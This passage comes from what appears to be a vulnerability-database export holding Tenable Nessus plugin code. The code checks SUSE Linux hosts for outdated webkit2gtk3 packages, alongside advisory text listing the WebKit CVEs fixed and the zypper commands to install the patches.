reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", 
reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:55:00", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command 
injection (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of 
service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182) \n\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application 
crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693) \n\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169) \n\n - CVE-2018-11646: 
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues :\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies of about:blank page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n - Do TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\n - Properly close the connection to the nested wayland compositor in the Web Process.\n\n - Avoid painting backing stores for zero-opacity layers.\n\n - Fix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\n - Fix video unpause when GStreamerGL is disabled.\n\n - Fix several GObject introspection annotations.\n\n - Update user agent quiks to fix Outlook.com and Chase.com.\n\n - Fix several crashes and rendering issues.\n\n - Improve error message when Gigacage cannot 
"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2933-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2933-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104428);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\", \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\", \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\", \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\", \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\", \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\", \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\", \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2017:2933-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.18.0 fixes the following\nissues: These security issues were fixed :\n\n - CVE-2017-7039: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code 
or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass 
the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted 
website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a web site (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory 
corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950) For other non-security fixes\n please check the changelog.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7586/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7589/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7592/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7599/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7623/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7632/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7635/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7639/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7641/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7654/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2350/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2354/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2355/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2356/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2362/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2363/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2365/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2369/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2371/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2017-2373/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2496/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2510/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2538/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7018/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7030/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7034/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7037/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7039/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7046/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7048/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7055/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7056/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7061/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7064/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172933-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f9052a2\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1815=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif 